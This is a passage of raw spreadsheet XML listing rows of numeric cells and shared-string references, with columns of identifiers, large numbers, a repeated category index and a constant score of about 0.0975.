      <c r="B22446" s="2">
        <v>4.2890034E7</v>
      </c>
      <c r="C22446" s="2" t="s">
        <v>21680</v>
      </c>
      <c r="D22446" s="2">
        <v>1.0</v>
      </c>
      <c r="E22446" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22446" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22447" ht="15.75" customHeight="1">
      <c r="A22447" s="1">
        <v>15557.0</v>
      </c>
      <c r="B22447" s="2">
        <v>4.3419872E7</v>
      </c>
      <c r="C22447" s="2" t="s">
        <v>21681</v>
      </c>
      <c r="D22447" s="2">
        <v>1.0</v>
      </c>
      <c r="E22447" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22447" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22448" ht="15.75" customHeight="1">
      <c r="A22448" s="1">
        <v>15673.0</v>
      </c>
      <c r="B22448" s="2">
        <v>4.3799915E7</v>
      </c>
      <c r="C22448" s="2" t="s">
        <v>21682</v>
      </c>
      <c r="D22448" s="2">
        <v>1.0</v>
      </c>
      <c r="E22448" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22448" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22449" ht="15.75" customHeight="1">
      <c r="A22449" s="1">
        <v>15709.0</v>
      </c>
      <c r="B22449" s="2">
        <v>4.396539E7</v>
      </c>
      <c r="C22449" s="2" t="s">
        <v>21683</v>
      </c>
      <c r="D22449" s="2">
        <v>1.0</v>
      </c>
      <c r="E22449" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22449" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22450" ht="15.75" customHeight="1">
      <c r="A22450" s="1">
        <v>15838.0</v>
      </c>
      <c r="B22450" s="2">
        <v>4.4368999E7</v>
      </c>
      <c r="C22450" s="2" t="s">
        <v>21684</v>
      </c>
      <c r="D22450" s="2">
        <v>1.0</v>
      </c>
      <c r="E22450" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22450" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22451" ht="15.75" customHeight="1">
      <c r="A22451" s="1">
        <v>15852.0</v>
      </c>
      <c r="B22451" s="2">
        <v>4.4454404E7</v>
      </c>
      <c r="C22451" s="2" t="s">
        <v>21553</v>
      </c>
      <c r="D22451" s="2">
        <v>1.0</v>
      </c>
      <c r="E22451" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22451" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22452" ht="15.75" customHeight="1">
      <c r="A22452" s="1">
        <v>15887.0</v>
      </c>
      <c r="B22452" s="2">
        <v>4.4554004E7</v>
      </c>
      <c r="C22452" s="2" t="s">
        <v>21685</v>
      </c>
      <c r="D22452" s="2">
        <v>1.0</v>
      </c>
      <c r="E22452" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22452" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22453" ht="15.75" customHeight="1">
      <c r="A22453" s="1">
        <v>15923.0</v>
      </c>
      <c r="B22453" s="2">
        <v>4.4685824E7</v>
      </c>
      <c r="C22453" s="2" t="s">
        <v>21686</v>
      </c>
      <c r="D22453" s="2">
        <v>1.0</v>
      </c>
      <c r="E22453" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22453" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22454" ht="15.75" customHeight="1">
      <c r="A22454" s="1">
        <v>15971.0</v>
      </c>
      <c r="B22454" s="2">
        <v>4.4837947E7</v>
      </c>
      <c r="C22454" s="2" t="s">
        <v>21687</v>
      </c>
      <c r="D22454" s="2">
        <v>1.0</v>
      </c>
      <c r="E22454" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22454" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22455" ht="15.75" customHeight="1">
      <c r="A22455" s="1">
        <v>15987.0</v>
      </c>
      <c r="B22455" s="2">
        <v>4.4917895E7</v>
      </c>
      <c r="C22455" s="2" t="s">
        <v>21688</v>
      </c>
      <c r="D22455" s="2">
        <v>1.0</v>
      </c>
      <c r="E22455" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22455" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22456" ht="15.75" customHeight="1">
      <c r="A22456" s="1">
        <v>16009.0</v>
      </c>
      <c r="B22456" s="2">
        <v>4.5000376E7</v>
      </c>
      <c r="C22456" s="5" t="s">
        <v>21689</v>
      </c>
      <c r="D22456" s="2">
        <v>1.0</v>
      </c>
      <c r="E22456" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22456" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22457" ht="15.75" customHeight="1">
      <c r="A22457" s="1">
        <v>16251.0</v>
      </c>
      <c r="B22457" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C22457" s="2" t="s">
        <v>21690</v>
      </c>
      <c r="D22457" s="2">
        <v>1.0</v>
      </c>
      <c r="E22457" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22457" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22458" ht="15.75" customHeight="1">
      <c r="A22458" s="1">
        <v>16421.0</v>
      </c>
      <c r="B22458" s="2">
        <v>4.6308865E7</v>
      </c>
      <c r="C22458" s="2" t="s">
        <v>21691</v>
      </c>
      <c r="D22458" s="2">
        <v>1.0</v>
      </c>
      <c r="E22458" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22458" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22459" ht="15.75" customHeight="1">
      <c r="A22459" s="1">
        <v>16646.0</v>
      </c>
      <c r="B22459" s="2">
        <v>4.7173365E7</v>
      </c>
      <c r="C22459" s="2" t="s">
        <v>21692</v>
      </c>
      <c r="D22459" s="2">
        <v>1.0</v>
      </c>
      <c r="E22459" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22459" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22460" ht="15.75" customHeight="1">
      <c r="A22460" s="1">
        <v>16758.0</v>
      </c>
      <c r="B22460" s="2">
        <v>4.7600894E7</v>
      </c>
      <c r="C22460" s="2" t="s">
        <v>21693</v>
      </c>
      <c r="D22460" s="2">
        <v>1.0</v>
      </c>
      <c r="E22460" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22460" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22461" ht="15.75" customHeight="1">
      <c r="A22461" s="1">
        <v>16779.0</v>
      </c>
      <c r="B22461" s="2">
        <v>4.7736792E7</v>
      </c>
      <c r="C22461" s="2" t="s">
        <v>21694</v>
      </c>
      <c r="D22461" s="2">
        <v>1.0</v>
      </c>
      <c r="E22461" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22461" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22462" ht="15.75" customHeight="1">
      <c r="A22462" s="1">
        <v>16787.0</v>
      </c>
      <c r="B22462" s="2">
        <v>4.7739505E7</v>
      </c>
      <c r="C22462" s="2" t="s">
        <v>21695</v>
      </c>
      <c r="D22462" s="2">
        <v>1.0</v>
      </c>
      <c r="E22462" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22462" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22463" ht="15.75" customHeight="1">
      <c r="A22463" s="1">
        <v>16903.0</v>
      </c>
      <c r="B22463" s="2">
        <v>4.8099062E7</v>
      </c>
      <c r="C22463" s="2" t="s">
        <v>21696</v>
      </c>
      <c r="D22463" s="2">
        <v>1.0</v>
      </c>
      <c r="E22463" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22463" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22464" ht="15.75" customHeight="1">
      <c r="A22464" s="1">
        <v>17072.0</v>
      </c>
      <c r="B22464" s="2">
        <v>4.8593225E7</v>
      </c>
      <c r="C22464" s="2" t="s">
        <v>21697</v>
      </c>
      <c r="D22464" s="2">
        <v>1.0</v>
      </c>
      <c r="E22464" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22464" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22465" ht="15.75" customHeight="1">
      <c r="A22465" s="1">
        <v>17195.0</v>
      </c>
      <c r="B22465" s="2">
        <v>4.8948357E7</v>
      </c>
      <c r="C22465" s="2" t="s">
        <v>21698</v>
      </c>
      <c r="D22465" s="2">
        <v>1.0</v>
      </c>
      <c r="E22465" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22465" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22466" ht="15.75" customHeight="1">
      <c r="A22466" s="1">
        <v>17362.0</v>
      </c>
      <c r="B22466" s="2">
        <v>4.9477049E7</v>
      </c>
      <c r="C22466" s="2" t="s">
        <v>21699</v>
      </c>
      <c r="D22466" s="2">
        <v>1.0</v>
      </c>
      <c r="E22466" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22466" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22467" ht="15.75" customHeight="1">
      <c r="A22467" s="1">
        <v>17388.0</v>
      </c>
      <c r="B22467" s="2">
        <v>4.9591637E7</v>
      </c>
      <c r="C22467" s="2" t="s">
        <v>21700</v>
      </c>
      <c r="D22467" s="2">
        <v>1.0</v>
      </c>
      <c r="E22467" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22467" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22468" ht="15.75" customHeight="1">
      <c r="A22468" s="1">
        <v>17445.0</v>
      </c>
      <c r="B22468" s="2">
        <v>4.9789309E7</v>
      </c>
      <c r="C22468" s="2" t="s">
        <v>21701</v>
      </c>
      <c r="D22468" s="2">
        <v>1.0</v>
      </c>
      <c r="E22468" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22468" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22469" ht="15.75" customHeight="1">
      <c r="A22469" s="1">
        <v>17454.0</v>
      </c>
      <c r="B22469" s="2">
        <v>4.9843593E7</v>
      </c>
      <c r="C22469" s="2" t="s">
        <v>21702</v>
      </c>
      <c r="D22469" s="2">
        <v>1.0</v>
      </c>
      <c r="E22469" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22469" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22470" ht="15.75" customHeight="1">
      <c r="A22470" s="1">
        <v>17700.0</v>
      </c>
      <c r="B22470" s="2">
        <v>5.0570957E7</v>
      </c>
      <c r="C22470" s="2" t="s">
        <v>21703</v>
      </c>
      <c r="D22470" s="2">
        <v>1.0</v>
      </c>
      <c r="E22470" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22470" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22471" ht="15.75" customHeight="1">
      <c r="A22471" s="1">
        <v>17760.0</v>
      </c>
      <c r="B22471" s="2">
        <v>5.0729372E7</v>
      </c>
      <c r="C22471" s="2" t="s">
        <v>21704</v>
      </c>
      <c r="D22471" s="2">
        <v>1.0</v>
      </c>
      <c r="E22471" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22471" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22472" ht="15.75" customHeight="1">
      <c r="A22472" s="1">
        <v>17833.0</v>
      </c>
      <c r="B22472" s="2">
        <v>5.0926796E7</v>
      </c>
      <c r="C22472" s="2" t="s">
        <v>21705</v>
      </c>
      <c r="D22472" s="2">
        <v>1.0</v>
      </c>
      <c r="E22472" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22472" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22473" ht="15.75" customHeight="1">
      <c r="A22473" s="1">
        <v>17916.0</v>
      </c>
      <c r="B22473" s="2">
        <v>5.115412E7</v>
      </c>
      <c r="C22473" s="2" t="s">
        <v>21706</v>
      </c>
      <c r="D22473" s="2">
        <v>1.0</v>
      </c>
      <c r="E22473" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22473" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22474" ht="15.75" customHeight="1">
      <c r="A22474" s="1">
        <v>18010.0</v>
      </c>
      <c r="B22474" s="2">
        <v>5.1477148E7</v>
      </c>
      <c r="C22474" s="2" t="s">
        <v>21707</v>
      </c>
      <c r="D22474" s="2">
        <v>1.0</v>
      </c>
      <c r="E22474" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22474" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22475" ht="15.75" customHeight="1">
      <c r="A22475" s="1">
        <v>18178.0</v>
      </c>
      <c r="B22475" s="2">
        <v>5.1974208E7</v>
      </c>
      <c r="C22475" s="2" t="s">
        <v>21708</v>
      </c>
      <c r="D22475" s="2">
        <v>1.0</v>
      </c>
      <c r="E22475" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22475" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22476" ht="15.75" customHeight="1">
      <c r="A22476" s="1">
        <v>18203.0</v>
      </c>
      <c r="B22476" s="2">
        <v>5.2051638E7</v>
      </c>
      <c r="C22476" s="2" t="s">
        <v>21709</v>
      </c>
      <c r="D22476" s="2">
        <v>1.0</v>
      </c>
      <c r="E22476" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22476" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22477" ht="15.75" customHeight="1">
      <c r="A22477" s="1">
        <v>18283.0</v>
      </c>
      <c r="B22477" s="2">
        <v>5.2258868E7</v>
      </c>
      <c r="C22477" s="2" t="s">
        <v>21710</v>
      </c>
      <c r="D22477" s="2">
        <v>1.0</v>
      </c>
      <c r="E22477" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22477" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22478" ht="15.75" customHeight="1">
      <c r="A22478" s="1">
        <v>18314.0</v>
      </c>
      <c r="B22478" s="2">
        <v>5.2376641E7</v>
      </c>
      <c r="C22478" s="2" t="s">
        <v>21711</v>
      </c>
      <c r="D22478" s="2">
        <v>1.0</v>
      </c>
      <c r="E22478" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22478" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22479" ht="15.75" customHeight="1">
      <c r="A22479" s="1">
        <v>18317.0</v>
      </c>
      <c r="B22479" s="2">
        <v>5.237856E7</v>
      </c>
      <c r="C22479" s="2" t="s">
        <v>21712</v>
      </c>
      <c r="D22479" s="2">
        <v>1.0</v>
      </c>
      <c r="E22479" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22479" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22480" ht="15.75" customHeight="1">
      <c r="A22480" s="1">
        <v>18498.0</v>
      </c>
      <c r="B22480" s="2">
        <v>5.294294E7</v>
      </c>
      <c r="C22480" s="2" t="s">
        <v>21713</v>
      </c>
      <c r="D22480" s="2">
        <v>1.0</v>
      </c>
      <c r="E22480" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22480" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22481" ht="15.75" customHeight="1">
      <c r="A22481" s="1">
        <v>18712.0</v>
      </c>
      <c r="B22481" s="2">
        <v>5.3658076E7</v>
      </c>
      <c r="C22481" s="2" t="s">
        <v>21714</v>
      </c>
      <c r="D22481" s="2">
        <v>1.0</v>
      </c>
      <c r="E22481" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22481" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22482" ht="15.75" customHeight="1">
      <c r="A22482" s="1">
        <v>18775.0</v>
      </c>
      <c r="B22482" s="2">
        <v>5.3797892E7</v>
      </c>
      <c r="C22482" s="2" t="s">
        <v>21715</v>
      </c>
      <c r="D22482" s="2">
        <v>1.0</v>
      </c>
      <c r="E22482" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22482" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22483" ht="15.75" customHeight="1">
      <c r="A22483" s="1">
        <v>18976.0</v>
      </c>
      <c r="B22483" s="2">
        <v>5.4378432E7</v>
      </c>
      <c r="C22483" s="2" t="s">
        <v>21716</v>
      </c>
      <c r="D22483" s="2">
        <v>1.0</v>
      </c>
      <c r="E22483" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22483" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22484" ht="15.75" customHeight="1">
      <c r="A22484" s="1">
        <v>19055.0</v>
      </c>
      <c r="B22484" s="2">
        <v>5.4578424E7</v>
      </c>
      <c r="C22484" s="2" t="s">
        <v>21717</v>
      </c>
      <c r="D22484" s="2">
        <v>1.0</v>
      </c>
      <c r="E22484" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22484" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22485" ht="15.75" customHeight="1">
      <c r="A22485" s="1">
        <v>19102.0</v>
      </c>
      <c r="B22485" s="2">
        <v>5.4704781E7</v>
      </c>
      <c r="C22485" s="2" t="s">
        <v>21718</v>
      </c>
      <c r="D22485" s="2">
        <v>1.0</v>
      </c>
      <c r="E22485" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22485" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22486" ht="15.75" customHeight="1">
      <c r="A22486" s="1">
        <v>19195.0</v>
      </c>
      <c r="B22486" s="2">
        <v>5.4985437E7</v>
      </c>
      <c r="C22486" s="2" t="s">
        <v>21719</v>
      </c>
      <c r="D22486" s="2">
        <v>1.0</v>
      </c>
      <c r="E22486" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22486" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22487" ht="15.75" customHeight="1">
      <c r="A22487" s="1">
        <v>19264.0</v>
      </c>
      <c r="B22487" s="2">
        <v>5.5128777E7</v>
      </c>
      <c r="C22487" s="2" t="s">
        <v>21720</v>
      </c>
      <c r="D22487" s="2">
        <v>1.0</v>
      </c>
      <c r="E22487" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22487" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22488" ht="15.75" customHeight="1">
      <c r="A22488" s="1">
        <v>19279.0</v>
      </c>
      <c r="B22488" s="2">
        <v>5.5161602E7</v>
      </c>
      <c r="C22488" s="2" t="s">
        <v>21721</v>
      </c>
      <c r="D22488" s="2">
        <v>1.0</v>
      </c>
      <c r="E22488" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22488" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22489" ht="15.75" customHeight="1">
      <c r="A22489" s="1">
        <v>19409.0</v>
      </c>
      <c r="B22489" s="2">
        <v>5.5593222E7</v>
      </c>
      <c r="C22489" s="2" t="s">
        <v>21722</v>
      </c>
      <c r="D22489" s="2">
        <v>1.0</v>
      </c>
      <c r="E22489" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22489" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22490" ht="15.75" customHeight="1">
      <c r="A22490" s="1">
        <v>19546.0</v>
      </c>
      <c r="B22490" s="2">
        <v>5.6034995E7</v>
      </c>
      <c r="C22490" s="2" t="s">
        <v>21723</v>
      </c>
      <c r="D22490" s="2">
        <v>1.0</v>
      </c>
      <c r="E22490" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22490" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22491" ht="15.75" customHeight="1">
      <c r="A22491" s="1">
        <v>19614.0</v>
      </c>
      <c r="B22491" s="2">
        <v>5.6203388E7</v>
      </c>
      <c r="C22491" s="2" t="s">
        <v>21724</v>
      </c>
      <c r="D22491" s="2">
        <v>1.0</v>
      </c>
      <c r="E22491" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22491" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22492" ht="15.75" customHeight="1">
      <c r="A22492" s="1">
        <v>19705.0</v>
      </c>
      <c r="B22492" s="2">
        <v>5.6532698E7</v>
      </c>
      <c r="C22492" s="2" t="s">
        <v>21725</v>
      </c>
      <c r="D22492" s="2">
        <v>1.0</v>
      </c>
      <c r="E22492" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22492" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22493" ht="15.75" customHeight="1">
      <c r="A22493" s="1">
        <v>19802.0</v>
      </c>
      <c r="B22493" s="2">
        <v>5.6876822E7</v>
      </c>
      <c r="C22493" s="2" t="s">
        <v>21726</v>
      </c>
      <c r="D22493" s="2">
        <v>1.0</v>
      </c>
      <c r="E22493" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22493" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22494" ht="15.75" customHeight="1">
      <c r="A22494" s="1">
        <v>20077.0</v>
      </c>
      <c r="B22494" s="2">
        <v>9066166.0</v>
      </c>
      <c r="C22494" s="2" t="s">
        <v>21727</v>
      </c>
      <c r="D22494" s="2">
        <v>1.0</v>
      </c>
      <c r="E22494" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22494" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22495" ht="15.75" customHeight="1">
      <c r="A22495" s="1">
        <v>20401.0</v>
      </c>
      <c r="B22495" s="2">
        <v>1.2171727E7</v>
      </c>
      <c r="C22495" s="2" t="s">
        <v>21728</v>
      </c>
      <c r="D22495" s="2">
        <v>1.0</v>
      </c>
      <c r="E22495" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22495" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22496" ht="15.75" customHeight="1">
      <c r="A22496" s="1">
        <v>20724.0</v>
      </c>
      <c r="B22496" s="2">
        <v>1.4659306E7</v>
      </c>
      <c r="C22496" s="2" t="s">
        <v>21729</v>
      </c>
      <c r="D22496" s="2">
        <v>1.0</v>
      </c>
      <c r="E22496" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22496" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22497" ht="15.75" customHeight="1">
      <c r="A22497" s="1">
        <v>20868.0</v>
      </c>
      <c r="B22497" s="2">
        <v>1.5914072E7</v>
      </c>
      <c r="C22497" s="2" t="s">
        <v>21730</v>
      </c>
      <c r="D22497" s="2">
        <v>1.0</v>
      </c>
      <c r="E22497" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22497" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22498" ht="15.75" customHeight="1">
      <c r="A22498" s="1">
        <v>20987.0</v>
      </c>
      <c r="B22498" s="2">
        <v>1.7012804E7</v>
      </c>
      <c r="C22498" s="2" t="s">
        <v>21731</v>
      </c>
      <c r="D22498" s="2">
        <v>1.0</v>
      </c>
      <c r="E22498" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22498" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22499" ht="15.75" customHeight="1">
      <c r="A22499" s="1">
        <v>21977.0</v>
      </c>
      <c r="B22499" s="2">
        <v>2.9207932E7</v>
      </c>
      <c r="C22499" s="2" t="s">
        <v>21732</v>
      </c>
      <c r="D22499" s="2">
        <v>1.0</v>
      </c>
      <c r="E22499" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22499" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22500" ht="15.75" customHeight="1">
      <c r="A22500" s="1">
        <v>22774.0</v>
      </c>
      <c r="B22500" s="2">
        <v>4.4987438E7</v>
      </c>
      <c r="C22500" s="2" t="s">
        <v>21733</v>
      </c>
      <c r="D22500" s="2">
        <v>1.0</v>
      </c>
      <c r="E22500" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22500" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22501" ht="15.75" customHeight="1">
      <c r="A22501" s="1">
        <v>22776.0</v>
      </c>
      <c r="B22501" s="2">
        <v>4.4987451E7</v>
      </c>
      <c r="C22501" s="2" t="s">
        <v>21733</v>
      </c>
      <c r="D22501" s="2">
        <v>1.0</v>
      </c>
      <c r="E22501" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22501" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22502" ht="15.75" customHeight="1">
      <c r="A22502" s="1">
        <v>22966.0</v>
      </c>
      <c r="B22502" s="2">
        <v>4.9188146E7</v>
      </c>
      <c r="C22502" s="2" t="s">
        <v>21734</v>
      </c>
      <c r="D22502" s="2">
        <v>1.0</v>
      </c>
      <c r="E22502" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22502" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22503" ht="15.75" customHeight="1">
      <c r="A22503" s="1">
        <v>23081.0</v>
      </c>
      <c r="B22503" s="2">
        <v>5.0606951E7</v>
      </c>
      <c r="C22503" s="2" t="s">
        <v>21735</v>
      </c>
      <c r="D22503" s="2">
        <v>1.0</v>
      </c>
      <c r="E22503" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22503" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22504" ht="15.75" customHeight="1">
      <c r="A22504" s="1">
        <v>23342.0</v>
      </c>
      <c r="B22504" s="2">
        <v>5.4746734E7</v>
      </c>
      <c r="C22504" s="2" t="s">
        <v>21736</v>
      </c>
      <c r="D22504" s="2">
        <v>1.0</v>
      </c>
      <c r="E22504" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22504" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22505" ht="15.75" customHeight="1">
      <c r="A22505" s="1">
        <v>23926.0</v>
      </c>
      <c r="B22505" s="2">
        <v>8596213.0</v>
      </c>
      <c r="C22505" s="2" t="s">
        <v>21737</v>
      </c>
      <c r="D22505" s="2">
        <v>1.0</v>
      </c>
      <c r="E22505" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22505" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22506" ht="15.75" customHeight="1">
      <c r="A22506" s="1">
        <v>24035.0</v>
      </c>
      <c r="B22506" s="2">
        <v>9456990.0</v>
      </c>
      <c r="C22506" s="2" t="s">
        <v>21738</v>
      </c>
      <c r="D22506" s="2">
        <v>1.0</v>
      </c>
      <c r="E22506" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22506" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22507" ht="15.75" customHeight="1">
      <c r="A22507" s="1">
        <v>24242.0</v>
      </c>
      <c r="B22507" s="2">
        <v>1.0500348E7</v>
      </c>
      <c r="C22507" s="2" t="s">
        <v>21739</v>
      </c>
      <c r="D22507" s="2">
        <v>1.0</v>
      </c>
      <c r="E22507" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22507" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22508" ht="15.75" customHeight="1">
      <c r="A22508" s="1">
        <v>24704.0</v>
      </c>
      <c r="B22508" s="2">
        <v>1.1657937E7</v>
      </c>
      <c r="C22508" s="2" t="s">
        <v>21740</v>
      </c>
      <c r="D22508" s="2">
        <v>1.0</v>
      </c>
      <c r="E22508" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22508" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22509" ht="15.75" customHeight="1">
      <c r="A22509" s="1">
        <v>24947.0</v>
      </c>
      <c r="B22509" s="2">
        <v>1.252306E7</v>
      </c>
      <c r="C22509" s="2" t="s">
        <v>21741</v>
      </c>
      <c r="D22509" s="2">
        <v>1.0</v>
      </c>
      <c r="E22509" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22509" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22510" ht="15.75" customHeight="1">
      <c r="A22510" s="1">
        <v>24977.0</v>
      </c>
      <c r="B22510" s="2">
        <v>1.2675442E7</v>
      </c>
      <c r="C22510" s="2" t="s">
        <v>21742</v>
      </c>
      <c r="D22510" s="2">
        <v>1.0</v>
      </c>
      <c r="E22510" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22510" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22511" ht="15.75" customHeight="1">
      <c r="A22511" s="1">
        <v>25033.0</v>
      </c>
      <c r="B22511" s="2">
        <v>1.2828833E7</v>
      </c>
      <c r="C22511" s="2" t="s">
        <v>21743</v>
      </c>
      <c r="D22511" s="2">
        <v>1.0</v>
      </c>
      <c r="E22511" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22511" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22512" ht="15.75" customHeight="1">
      <c r="A22512" s="1">
        <v>25134.0</v>
      </c>
      <c r="B22512" s="2">
        <v>1.301877E7</v>
      </c>
      <c r="C22512" s="2" t="s">
        <v>21744</v>
      </c>
      <c r="D22512" s="2">
        <v>1.0</v>
      </c>
      <c r="E22512" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22512" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22513" ht="15.75" customHeight="1">
      <c r="A22513" s="1">
        <v>25135.0</v>
      </c>
